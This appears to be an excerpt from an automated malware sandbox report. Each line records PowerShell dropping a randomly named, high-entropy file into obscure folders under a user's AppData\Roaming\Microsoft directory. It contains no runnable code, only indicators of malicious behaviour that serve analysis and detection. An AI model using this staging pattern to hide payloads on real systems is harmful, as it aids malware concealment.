Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yxVDqATSIgmEaow.tCUBdJhbWXOanjxQkFm entropy: 7.99655267587	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\iEbWgPnpSUAyGuqMrx.FnlgkRCQMu entropy: 7.99828166266	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\cEixHDpRSbGoMnw.qfVrymThPLnRHwka entropy: 7.99890425031	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NhzISGMiWLK.FoSMUiBjIOqvPLGArWZ entropy: 7.99905128021	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\XFnqQAeSyamo.PIHMRbqkjNxYrFK entropy: 7.99834738166	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZsjwOleqGD.UzRqbtlWnYJemirF entropy: 7.99900959303	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JZugjXlKPRDGHtdk.szdGigjaICe entropy: 7.99838466214	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SNfqXWseACDYPwzQ.zZyeDbCsxNiEqo entropy: 7.99813110058	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BmligDTVfWspEvFzRyn.AeTocESRpjXhvwL entropy: 7.99926180937	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\TnUQAapRFokScBVZr.HPrzCjKJLsWvleBnag entropy: 7.99904821157	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\DdzcAynZtmsRVQPha.qkRvWEKJSDfwdI entropy: 7.99781882304	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pQXTzPisLB.YdjTlwyLCtcMAvebi entropy: 7.99889501135	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BwtlDgayxqGrXA.yHZagIvPMxmTk entropy: 7.99745963826	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BokmnrsbFvKeE.VqlvzOiugmdSKDa entropy: 7.99886772398	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\MRopmcZlCdzqrDeK.QrWZVTJFGdxRDg entropy: 7.99809356057	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nXQyPJREFYVr.DZWwJkOCadAIqNzRUb entropy: 7.99677399623	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CITDFuAyxedS.eEXnVCkTfxhNpYm entropy: 7.99730376841	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\myCDPrgjnR.KCxashNtpXoFqU entropy: 7.99872090658	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JtUkMHGaXsF.zkZJWVaXIpoABtDUFSe entropy: 7.99862945424	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\eUWLNnJZxvDip.wXGAuojSarmH entropy: 7.99660111315	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nPXqjuIxoMDLiSlCvs.TjKOMamqZUkPisWHI entropy: 7.99898051639	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xEhAdZBcKiNHYUgDO.HGiMcEFULaTpwd entropy: 7.99867149139	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ebxJqEhBDMUgpyXLQ.AYKaQVWmfcvpu entropy: 7.99866620858	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\foXZDmFaPQ.KSmRxQMybXwOtWkpGA entropy: 7.99804070414	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\wbZCNGUTiASHjxVP.HTyKsSCElrvbFLGw entropy: 7.99911227852	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ukXdIJCjQiwVqUzcpge.UGkcfSbxtaIQhOTy entropy: 7.99842569695	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\TMRbfmnDHLQPiZhcgBu.QwDBFeylVjmri entropy: 7.99896133031	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\swLIboOUguvKMPya.xQzYFWrtiZyIc entropy: 7.99696048784	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nKOVWUsceFtgCQ.JCSltuOZpvwXe entropy: 7.99870993024	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\sPrBLOdoVUbWAZJcg.pIlSNOWbiKfFGRn entropy: 7.99876169199	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uDrBQJehSFqCAORV.RmzhDMWaIwbf entropy: 7.99741456185	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uidAmkRFgzoEf.zFpOjWYnxfALGCb entropy: 7.99893266095	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\baURfqVxYjlIenztg.APFKxGJCDcrZWBVseNz entropy: 7.99862515429	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hOBYjRLDcpGkugPXAe.AvytmEoNsK entropy: 7.99916369398	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\knQNGYBgAj.pLXocvlwDYKyPfAkBz entropy: 7.99897625916	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OdQIpiJKgGjAyuCS.kpKeavduDMzJU entropy: 7.99848442771	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\emMYRhVDjtOUB.xuLHNFfbywWdgXTSRk entropy: 7.99850935618	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BEKUtgixuFlSIDYqm.ZJcNmvtRqreC entropy: 7.99898431695	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\phxvjqKWoNTLX.RzKQvdiISluOcBCT entropy: 7.9974710055	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SrEmOPxnLhiZMV.HFSUjCIdGJzQbuaePhx entropy: 7.99890361169	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xIbDcjfETHZkXpRUsN.CbOdUzFVEYKoNtk entropy: 7.99837998588	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\IZVPfCqJKaQrlmDn.qgLhaXVerAzB entropy: 7.99695719249	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OXurUWfqiLtKvg.xZAqPjiHMG entropy: 7.99884115643	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nWOcjDbFwvu.QbIUYAzaBOP entropy: 7.99750558339	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CsOcwJzfExipu.gYFLesBTlj entropy: 7.9984493161	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LfhvHKitGzrBOdcDCQ.GmNFixdOoWvawDBnKlZ entropy: 7.99782897311	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yHSDtLZrXoimRq.DQMCytjvrwL entropy: 7.9968297232	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\IklzSmRaQUptqrcoABH.jxDvloOhPWBa entropy: 7.99799105606	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\majDeXuHdCRsMFxrkiB.vmUGbFLgEhloPWp entropy: 7.9980235206	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\sfycAWHFtKpY.GAoBrVzDJCnP entropy: 7.99781032678	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\DgUAqinYryFdTXeVw.ToMaBptzhqYFuOA entropy: 7.9990177278	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\kJoPvHKVEGCiaRx.AjeZclaKmFdp entropy: 7.99911995398	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nxkFyrmsBzS.YBjUZGFSMVPslXNyebx entropy: 7.99871490519	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\knjGYphclACHIByuTxd.YOARspixmVtI entropy: 7.99911550743	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rSOHCVZlYftcv.UeLDJVTvnGt entropy: 7.99816773067	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NEKtWBfuDaqRPXZdxM.ediyQEzLOuTn entropy: 7.996359616	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zDPqbfGvHCFRSZBm.ijsxGPLHIB entropy: 7.99818176872	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\oIDuEdeHBFW.XnbHyjckTvr entropy: 7.99902598421	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yUwDuqRetp.BgkYImWaxFvRlTN entropy: 7.99879497896	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\FpDZEovLRufKSabhdJ.vxCIEGuVURlcfps entropy: 7.99824129933	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JwCWisfRXVl.dAjDuFhKbVnMRNQ entropy: 7.99714848206	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\wbLATKrCEIt.LOreogPMcWutwRfXQEY entropy: 7.99840602167	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LOTBqoQxmUyJKRufzj.uXYxUIaEQOVmPw entropy: 7.9981224603	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\VqucKxkRHeJrFmpyv.UjoXwLYMEVqhZscn entropy: 7.99747981456	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\DpZwxUFtEalLShXP.TICyeNmufdxULHovYz entropy: 7.99816585458	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\DwjiaXmnIcsAKRx.VGNcvQqxWPTjwgsybe entropy: 7.99872675988	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JOmRshrnlSQwpG.zDMykKGsQoVU entropy: 7.99899300281	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ADPLMuNZCjmSWYXJeG.QLrRqYFtNd entropy: 7.99713055318	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\crjCLVRwlHBzkeM.PzYMvDgtoBapeLu entropy: 7.99884660829	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KzRYhewSynBipuk.eEuhMmYCcsnvWzy entropy: 7.99864304317	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nAmlfDaXRcUB.brEYySgKmxpnzD entropy: 7.99759438202	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\HZizkhwlORyEuvm.GkirBEoQpdJWgDw entropy: 7.99879764549	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hZIDxbvErgwOMj.IvpheZgswJKVQxEorMi entropy: 7.99751525692	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\FMRqunZXxToA.SfBpJyObGDjcuEQLMAP entropy: 7.99822710014	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\tRXFeDumUTVnaWLy.VLasWwYSgHp entropy: 7.99892978274	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pJaSKcNVqCmXIy.RHZsaACTSmF entropy: 7.99632016523	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JRvdPGOVfMNkiQ.dezIYsPWOrbu entropy: 7.99662708576	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NxrMydnCDUWLO.ifkevDhlaCPWJKQFz entropy: 7.99740943317	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\WDEyzLqkCM.vIWLZJTUQeXwoBdbjz entropy: 7.99646917065	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XpxErPtWTL.cLUkfYwZNJDjmxQhor entropy: 7.99888250139	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\EVdXtaHehiwUYcRjQLb.MYlOzZwJQRUXqPScv entropy: 7.99844492399	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\wyXuHqjMCEcrBLWzsD.YoHGmskqxCvOAMKdeb entropy: 7.99655964209	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\VLmlaiIjPOeFQEuYnS.InyPlCeSKZHW entropy: 7.99663827933	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\zjpdqTwBeoMJyCXsWAV.BrPiUdlLcqpuY entropy: 7.99860282565	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\jBctwbJUYQs.WMefKBPGVhZkQ entropy: 7.99861289821	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\rMAYSnNHklQqjcbPpW.RBtrMlOJPWn entropy: 7.99809773201	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XdJLfAPsVEkGoCFjB.lqsaWnrgEutRN entropy: 7.99880077857	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\hIpelZfQuvJKWUOLoVD.zKwVBHqpsmJnh entropy: 7.99851282863	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\KQtxbMyISCZDzwJGrl.qAHRtFrZeJigynfYUa entropy: 7.9988098214	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\oNUbHycewlGjFJ.rwGuKhvFZEONbqeDHs entropy: 7.99829300991	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\cyHxvPFNiYdl.upJSaBrOTidGvf entropy: 7.99815581085	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GTMmwYBvHkCSKeOoh.GNAbfUMJLQrcOPWY entropy: 7.9980920147	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\fEoHOvnbYAkmGrM.bLFZTCmwJkhY entropy: 7.99793950883	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\QwgDzNimfFkrC.rZJhVMnXWY entropy: 7.9983869201	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YSRjVZFDGpW.SoKvAQwlgn entropy: 7.99809337767	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\MqRsjEJozmAZf.IRskXTAQodWCNEwzmG entropy: 7.99885520602	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\sqUrokuhbgcilCTvO.cKQGgLSVTOFqZAJRin entropy: 7.99820135181	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\VkFSPUThgxu.MoXreVLOpCYQ entropy: 7.997920158	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\gHDhkuyGOvTQoX.UOMfVLgnkrsZih entropy: 7.99874064634	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tohABNiMgKTCJxR.HKQkSJTEwoOV entropy: 7.99909419182	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tQUZgDbHKG.IAhemCJNfU entropy: 7.99759883257	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\PXrHhmDTMRQAvJi.UrHvZEsygYOBXRL entropy: 7.99823275406	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\ovEgjfIUlhNQZmcOxd.UQYfBKaeVLxgXZsqjnm entropy: 7.99849556381	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\KNmfPuUXxeJLoaFGT.hdZYEPpSVXwoUig entropy: 7.99893359048	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\wVxiapmoDynFfTc.qSyDJKXHkQsTfC entropy: 7.9978264634	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\hSMvoYKqblcIsB.LDFlagUrGbzYqhT entropy: 7.99896642265	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\gJPRGvcenZtzVNH.dzQCVhBDSPAsrYK entropy: 7.99887248744	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\fjZizcUWapTEobM.FLMJIgnwsqodxkZXHzW entropy: 7.99685020564	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\wTlyomWzBMeaGY.CrGxtklDXV entropy: 7.99658264596	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\bBCpUwEPdgWtHTcjq.hGSlXspwgKjAy entropy: 7.99757612615	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\LVIoySHhNPxpaBbADmu.ylCYVRrQFLOpPmfxb entropy: 7.99907539218	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YIbaZhVXUpc.YLTPDdkrAsy entropy: 7.99660090302	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\TAMQwksfxy.SGPNoTUnQVMYxwvlA entropy: 7.99715136694	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\qLPKijlFQOBnJkcH.nspBrHZmezFqgxSODLG entropy: 7.99810902061	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GfYstgFhvHkdpQ.hjFQHYbUyNtIXVMJqgT entropy: 7.99903773698	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\CcXuzVtZviY.ZURkIGVlPojtgs entropy: 7.99890209782	Jump to dropped file
